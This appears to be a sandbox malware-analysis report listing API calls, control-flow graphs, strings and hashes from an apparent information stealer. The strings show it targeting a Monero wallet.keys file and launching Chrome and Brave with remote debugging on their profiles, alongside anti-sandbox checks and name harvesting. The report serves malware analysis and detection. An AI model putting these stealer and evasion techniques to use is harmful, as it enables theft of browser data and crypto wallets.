                                    • Opcode Fuzzy Hash: e9dd927ba5d8241795f7d7c448003f58d2ab1af21ea631acb10f15d4920f02b9
                                    • Instruction Fuzzy Hash: 75120172910518ABDB26EB90DDA2FEEB379AF54700F1081D9F10A6A091DF746F48CF61

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0037AB30: lstrlen.KERNEL32(00364F55,?,?,00364F55,00380DDF), ref: 0037AB3B
                                      • Part of subcall function 0037AB30: lstrcpy.KERNEL32(00380DDF,00000000), ref: 0037AB95
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00375894
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003758F1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00375AA7
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 00375440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00375478
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 00375510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00375568
                                      • Part of subcall function 00375510: lstrlen.KERNEL32(00000000), ref: 0037557F
                                      • Part of subcall function 00375510: StrStrA.SHLWAPI(00000000,00000000), ref: 003755B4
                                      • Part of subcall function 00375510: lstrlen.KERNEL32(00000000), ref: 003755D3
                                      • Part of subcall function 00375510: lstrlen.KERNEL32(00000000), ref: 003755FE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003759DB
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00375B90
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00375C5C
                                    • Sleep.KERNEL32(0000EA60), ref: 00375C6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: eca4ad822c934efb8f78f2fec99bcb2a913d05a431cb889871f086c5bc7ec9bb
                                    • Instruction ID: 0f14accd0f0d6dc72194ad3f01b794a5918a7db5c7919562062e56474cc352ee
                                    • Opcode Fuzzy Hash: eca4ad822c934efb8f78f2fec99bcb2a913d05a431cb889871f086c5bc7ec9bb
                                    • Instruction Fuzzy Hash: 75E135719105049BCB2AFBA0DD66DED737EAF94300F50C568F50B6A095EF786B08CB92

                                    Control-flow Graph

                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00371A15
                                    • ExitProcess.KERNEL32 ref: 00371A21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 8ffd9cdc2612be073d556bbe5f7de699b07e0c34acb32a555cdbb1943632625f
                                    • Instruction ID: 3e3ec125c801f8ff394de0a562394bfb3789ca7187aa89782c6915d3eb78fae9
                                    • Opcode Fuzzy Hash: 8ffd9cdc2612be073d556bbe5f7de699b07e0c34acb32a555cdbb1943632625f
                                    • Instruction Fuzzy Hash: B85132B5B04209EFCB79DFD8D954AAE77B9EF44704F108088F40AAB250E778E949CB51

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F306F0), ref: 00379BF1
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F30648), ref: 00379C0A
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F30840), ref: 00379C22
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F30570), ref: 00379C3A
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F30588), ref: 00379C53
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F38AA0), ref: 00379C6B
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F264E0), ref: 00379C83
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F26280), ref: 00379C9C
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F305A0), ref: 00379CB4
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F30690), ref: 00379CCC
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F305B8), ref: 00379CE5
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F305D0), ref: 00379CFD
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F26660), ref: 00379D15
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F30708), ref: 00379D2E
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 003611D0: ExitProcess.KERNEL32 ref: 00361211
                                      • Part of subcall function 00361160: GetSystemInfo.KERNEL32(?), ref: 0036116A
                                      • Part of subcall function 00361160: ExitProcess.KERNEL32 ref: 0036117E
                                      • Part of subcall function 00361110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0036112B
                                      • Part of subcall function 00361110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00361132
                                      • Part of subcall function 00361110: ExitProcess.KERNEL32 ref: 00361143
                                      • Part of subcall function 00361220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0036123E
                                      • Part of subcall function 00361220: ExitProcess.KERNEL32 ref: 00361294
                                      • Part of subcall function 00376A10: GetUserDefaultLangID.KERNEL32 ref: 00376A14
                                      • Part of subcall function 00361190: ExitProcess.KERNEL32 ref: 003611C6
                                      • Part of subcall function 003779E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003611B7), ref: 00377A10
                                      • Part of subcall function 003779E0: RtlAllocateHeap.NTDLL(00000000), ref: 00377A17
                                      • Part of subcall function 003779E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00377A2F
                                      • Part of subcall function 00377A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377AA0
                                      • Part of subcall function 00377A70: RtlAllocateHeap.NTDLL(00000000), ref: 00377AA7
                                      • Part of subcall function 00377A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00377ABF
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F38AB0,?,003810F4,?,00000000,?,003810F8,?,00000000,00380AF3), ref: 00376D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00376D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00376D99
                                    • Sleep.KERNEL32(00001770), ref: 00376DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,00F38AB0,?,003810F4,?,00000000,?,003810F8,?,00000000,00380AF3), ref: 00376DBA
                                    • ExitProcess.KERNEL32 ref: 00376DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2931873225-0
                                    • Opcode ID: 5751956bcdee18b08d4e4b370cca95d0f1853b2faf53ed84cb4fb97ff625e250
                                    • Instruction ID: bb59ada8f92da6f5c4bcd89730989eac0215ffdab8ab7e59a57c64ef97b0ce50
                                    • Opcode Fuzzy Hash: 5751956bcdee18b08d4e4b370cca95d0f1853b2faf53ed84cb4fb97ff625e250
                                    • Instruction Fuzzy Hash: 21315071A04608ABDB27F7F0DC67BEE7379AF40700F148918F116AA191DF785905C7A2

                                    Control-flow Graph (legend: Executed / Not Executed)

                                    • 376d93 -> 376daa
                                    • 376daa -> 376dac-376dc2 (call 376bc0, call 375d60, CloseHandle, ExitProcess)
                                    • 376daa -> 376d5a-376d77 (call 37ade0, OpenEventA)
                                    • 376d5a-376d77 -> 376d95-376da4 (CloseHandle, Sleep) -> 376daa
                                    • 376d5a-376d77 -> 376d79-376d91 (call 37ade0, CreateEventA) -> 376dac-376dc2
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F38AB0,?,003810F4,?,00000000,?,003810F8,?,00000000,00380AF3), ref: 00376D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00376D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00376D99
                                    • Sleep.KERNEL32(00001770), ref: 00376DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,00F38AB0,?,003810F4,?,00000000,?,003810F8,?,00000000,00380AF3), ref: 00376DBA
                                    • ExitProcess.KERNEL32 ref: 00376DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 7a2dacba466a307afa7f0f1b1cd8d03e13fa3205e7e940a07e1cdf2c3637caa9
                                    • Instruction ID: cc40c6ce47bd417ad46a931f75fa27ef333a6af1773962b9fe95b3045959355f
                                    • Opcode Fuzzy Hash: 7a2dacba466a307afa7f0f1b1cd8d03e13fa3205e7e940a07e1cdf2c3637caa9
                                    • Instruction Fuzzy Hash: 8EF08970648609AFEB32BBA0DC67BBD3374EF04701F148515B51A995D1CBF85900DA91

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364889
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00364899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: e1a4a2dfa31d439a3ba93f8e965fb976afb32de94be86bb20ab72ea5ebf3e553
                                    • Instruction ID: 9827e49f7c473f2783f63fcd1a3ec764abab6a8d988ce13ff1ec6e7cbcf2dd25
                                    • Opcode Fuzzy Hash: e1a4a2dfa31d439a3ba93f8e965fb976afb32de94be86bb20ab72ea5ebf3e553
                                    • Instruction Fuzzy Hash: 3E214FB1D00209ABDF24DFA5EC46ADD7B75FB44320F108625F915AB2D0DB706A09CF91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 003662D0: InternetOpenA.WININET(00380DFF,00000001,00000000,00000000,00000000), ref: 00366331
                                      • Part of subcall function 003662D0: StrCmpCA.SHLWAPI(?,00F3E4F0), ref: 00366353
                                      • Part of subcall function 003662D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00366385
                                      • Part of subcall function 003662D0: HttpOpenRequestA.WININET(00000000,GET,?,00F3DBF0,00000000,00000000,00400100,00000000), ref: 003663D5
                                      • Part of subcall function 003662D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0036640F
                                      • Part of subcall function 003662D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00366421
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00375478
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: 91334e347fcd03250d6862be1efd1584e2ab919ab00e3c59bbd2a002b7c5d4d0
                                    • Instruction ID: be4fcc31b554f0766b33fe858636dedba492a157e248b3bfa91d2fd446757052
                                    • Opcode Fuzzy Hash: 91334e347fcd03250d6862be1efd1584e2ab919ab00e3c59bbd2a002b7c5d4d0
                                    • Instruction Fuzzy Hash: 1D111F719105089ACB25FFA4DD62AED73399F90340F50C568E91F5E492EF34AB04CB91

                                    Control-flow Graph (legend: Executed / Not Executed)

                                    • 361220-361247 (call 378b40, GlobalMemoryStatusEx) -> 361273-36127a
                                    • 361220-361247 -> 361249-361271 (call 37dd30 * 2)
                                    • 361273-36127a -> 361281-361285
                                    • 361249-361271 -> 361281-361285
                                    • 361281-361285 -> 361287
                                    • 361281-361285 -> 36129a-36129d
                                    • 361287 -> 361292-361294 (ExitProcess)
                                    • 361287 -> 361289-361290
                                    • 361289-361290 -> 36129a-36129d
                                    • 361289-361290 -> 361292-361294 (ExitProcess)
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0036123E
                                    • ExitProcess.KERNEL32 ref: 00361294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: a3a4c96361fd223c1ae94a1d48a5086db8cb78b86792b899489a6b50a17dc996
                                    • Instruction ID: 57aff62b392df3b5e0bce6f0db04712b4391b34d53ddd58e1d30471324b7d266
                                    • Opcode Fuzzy Hash: a3a4c96361fd223c1ae94a1d48a5086db8cb78b86792b899489a6b50a17dc996
                                    • Instruction Fuzzy Hash: E50112F0D54308FAEB21DFE4CC59B9DB778AF14705F14C848E604BA1C4D6B455458759
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377AA0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00377AA7
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00377ABF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: fd5c9d89654aee07412041a1f773ddbdb165c566d704926cc1919371764e5e9b
                                    • Instruction ID: 067e933c508e909693486917c649ea9f603056fbe289fa9b7151784e11394e39
                                    • Opcode Fuzzy Hash: fd5c9d89654aee07412041a1f773ddbdb165c566d704926cc1919371764e5e9b
                                    • Instruction Fuzzy Hash: 220186B1908349EBD725DF98DD45BAFBBBCFB04711F104159F505E2780D7B85A0087A1
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0036112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00361132
                                    • ExitProcess.KERNEL32 ref: 00361143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: 7930976e96e9e6656d0dca73ab02be961ff2ecdf7110182383b7923ac5d5e4f2
                                    • Instruction ID: 90f7bdbcf26c443093da5d02cd4be7879babd10dc5e5c58aa83ab91b4cbc1837
                                    • Opcode Fuzzy Hash: 7930976e96e9e6656d0dca73ab02be961ff2ecdf7110182383b7923ac5d5e4f2
                                    • Instruction Fuzzy Hash: 40E0CDB094D30CFBE7215BA0DD0EB0D777C9B04B01F105144F708BA1D0C6F4264096D8
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003610B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003610F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: a4b63f794657b21336dfea3b5cc5e04115bcee17f2f7635d2230e163b94841fa
                                    • Instruction ID: 71025a23a075e17d04baf4e13cef5bbaa0498ed70058e7369538a76bffc81865
                                    • Opcode Fuzzy Hash: a4b63f794657b21336dfea3b5cc5e04115bcee17f2f7635d2230e163b94841fa
                                    • Instruction Fuzzy Hash: 9EF082B1681218BBEB249AA4AC59FAFB798E705B05F305448F944E7280D5719F009AA4
                                    APIs
                                      • Part of subcall function 00377A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377AA0
                                      • Part of subcall function 00377A70: RtlAllocateHeap.NTDLL(00000000), ref: 00377AA7
                                      • Part of subcall function 00377A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00377ABF
                                      • Part of subcall function 003779E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003611B7), ref: 00377A10
                                      • Part of subcall function 003779E0: RtlAllocateHeap.NTDLL(00000000), ref: 00377A17
                                      • Part of subcall function 003779E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00377A2F
                                    • ExitProcess.KERNEL32 ref: 003611C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 5bb2c0be9ed2f5744c13a4e98ed829d96777a0138c6fbab7093756abbeefb987
                                    • Instruction ID: fdbd2ca89fa6023ef590081d858cdc4791ee9967253ef78f0110dc70a3ebfe95
                                    • Opcode Fuzzy Hash: 5bb2c0be9ed2f5744c13a4e98ed829d96777a0138c6fbab7093756abbeefb987
                                    • Instruction Fuzzy Hash: 0AE012E694430153DB3273B4BC0BB1B33CD5B1630EF049418FA0C86102EE6DE81041A5
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00380B32,00380B2F,00000000,?,?,?,00381450,00380B2E), ref: 0036BEC5
                                    • StrCmpCA.SHLWAPI(?,00381454), ref: 0036BF33
                                    • StrCmpCA.SHLWAPI(?,00381458), ref: 0036BF49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0036C8A9
                                    • FindClose.KERNEL32(000000FF), ref: 0036C8BB
                                    Strings
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0036C3B2
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0036C495
                                    • Preferences, xrefs: 0036C104
                                    • \Brave\Preferences, xrefs: 0036C1C1
                                    • Google Chrome, xrefs: 0036C6F8
                                    • Brave, xrefs: 0036C0E8
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0036C534
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-1869280968
                                    • Opcode ID: 264be8ee4b907889e153a8b20278b3688fb5ea6161dc9d53cd798be2a549e299
                                    • Instruction ID: c9132df0c79e3891fb92c0c5e819a712b9008599a3e18d9e77edfece09401ce9
                                    • Opcode Fuzzy Hash: 264be8ee4b907889e153a8b20278b3688fb5ea6161dc9d53cd798be2a549e299
                                    • Instruction Fuzzy Hash: F85245725105085BCB76FB60DDA6EEE737DAF94300F408598F50EAA091EE345B48CFA2
                                    APIs
                                    • wsprintfA.USER32 ref: 00373B1C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00373B33
                                    • lstrcat.KERNEL32(?,?), ref: 00373B85
                                    • StrCmpCA.SHLWAPI(?,00380F58), ref: 00373B97
                                    • StrCmpCA.SHLWAPI(?,00380F5C), ref: 00373BAD
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00373EB7
                                    • FindClose.KERNEL32(000000FF), ref: 00373ECC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 615205e537de3a1e61b62d4d2f4a04dc9e395c36e17d1f750be6173fd217579c
                                    • Instruction ID: 7b58c298a7f15cd89ad90717b58bcb5f4020a3fde8d0097cb43b2723cadbf227
                                    • Opcode Fuzzy Hash: 615205e537de3a1e61b62d4d2f4a04dc9e395c36e17d1f750be6173fd217579c
                                    • Instruction Fuzzy Hash: 21A122B2A002189BDB75DF64DC85FEE737DAB45700F048589F60D96141DB749B88CF91
                                    APIs
                                    • wsprintfA.USER32 ref: 00374B7C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00374B93
                                    • StrCmpCA.SHLWAPI(?,00380FC4), ref: 00374BC1
                                    • StrCmpCA.SHLWAPI(?,00380FC8), ref: 00374BD7
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00374DCD
                                    • FindClose.KERNEL32(000000FF), ref: 00374DE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: d0b60b957900afff6d5ae094f4caf29ddb16334ab367428e67bccc4c4f2e3050
                                    • Instruction ID: 4fe8fe3f0cb4d0c8cc7b27600b4247049dbaaab5e7f54b8ab75ea3717f93bb2c
                                    • Opcode Fuzzy Hash: d0b60b957900afff6d5ae094f4caf29ddb16334ab367428e67bccc4c4f2e3050
                                    • Instruction Fuzzy Hash: 116139B2500218ABCB75EBA0DC45FEA737DAB48700F0485D8F64D96155EB74AB88CF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003747D0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003747D7
                                    • wsprintfA.USER32 ref: 003747F6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0037480D
                                    • StrCmpCA.SHLWAPI(?,00380FAC), ref: 0037483B
                                    • StrCmpCA.SHLWAPI(?,00380FB0), ref: 00374851
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003748DB
                                    • FindClose.KERNEL32(000000FF), ref: 003748F0
                                    • lstrcat.KERNEL32(?,00F3E530), ref: 00374915
                                    • lstrcat.KERNEL32(?,00F3D578), ref: 00374928
                                    • lstrlen.KERNEL32(?), ref: 00374935
                                    • lstrlen.KERNEL32(?), ref: 00374946
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 83a92986a212c66640903b55131e797d7ab5f46f95e4e11a7c5b32c57246ba6d
                                    • Instruction ID: aae4d4693abc2a2720acf620dd59ccea1f0f981b4ec3fd4a39e328fe46619094
                                    • Opcode Fuzzy Hash: 83a92986a212c66640903b55131e797d7ab5f46f95e4e11a7c5b32c57246ba6d
                                    • Instruction Fuzzy Hash: A45145B2544218ABCB75EB70DC89FEE737DAB58700F409588B60D96150EB749B84CF91
                                    APIs
                                    • wsprintfA.USER32 ref: 00374113
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0037412A
                                    • StrCmpCA.SHLWAPI(?,00380F94), ref: 00374158
                                    • StrCmpCA.SHLWAPI(?,00380F98), ref: 0037416E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003742BC
                                    • FindClose.KERNEL32(000000FF), ref: 003742D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 01061f7f7918f5f79bf2eae0ca6e9520df251dc29b7f096e9b58e2ddeb482968
